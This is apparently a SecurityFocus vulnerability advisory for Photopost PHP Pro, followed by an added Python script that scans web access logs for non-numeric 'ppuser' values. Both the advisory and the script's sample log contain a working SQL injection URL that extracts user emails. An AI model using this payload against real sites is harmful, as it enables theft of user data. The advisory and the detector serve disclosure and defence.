All Enthusiast Photopost PHP Pro Multiple Input Validation Vulnerabilities

No exploit is required to carry out a successful attack.

The following proof-of-concept example, which exploits the SQL injection issue in the 'ppuser' parameter, is available:

http://www.example.com/showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,0,0,0,0,0,0%20FROM%20user%20WHERE%20userid='1&cat=500
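
For defenders, an added example (not part of the original advisory or of PhotoPost itself): a Python check that scans web server access logs for requests to showgallery.php whose 'ppuser' value is not a plain number. It assumes combined-log-format lines and that a legitimate 'ppuser' is a numeric user id; the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Request line inside a combined-log-format entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Assumption: a legitimate ppuser value is a plain numeric user id.
NUMERIC_ID = re.compile(r"\d{1,10}")


def suspicious_ppuser(log_line):
    """Return the decoded ppuser value if it is not a numeric id, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    if not target.path.lower().endswith("/showgallery.php"):
        return None
    values = parse_qs(target.query, keep_blank_values=True).get("ppuser", [])
    for value in values:
        # parse_qs percent-decodes once; decode again so that a
        # double-encoded value is judged in its final form.
        decoded = unquote(value)
        if not NUMERIC_ID.fullmatch(decoded):
            return decoded
    return None


def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        value = suspicious_ppuser(line)
        if value is not None:
            hits.append((number, value))
    return hits


# Constructed sample access-log lines; the second carries the request
# shown in the advisory, the third a double-encoded quote character.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /showgallery.php?ppuser=42&cat=500 HTTP/1.1" 200 5120
192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /showgallery.php?ppuser=-2'%20UNION%20SELECT%200,email,0,0,0,0,0,0%20FROM%20user%20WHERE%20userid='1&cat=500 HTTP/1.1" 200 4096
192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /showgallery.php?ppuser=12%2527&cat=500 HTTP/1.1" 200 4096
192.0.2.13 - - [01/Jan/2010:10:00:12 +0000] "GET /index.php?ppuser=abc HTTP/1.1" 200 1024
""".splitlines()

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-numeric ppuser -> {value!r}")
```

The same numeric-only rule, enforced on 'ppuser' before it reaches the query, is the corresponding server-side input validation.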

Copyright 2010, SecurityFocus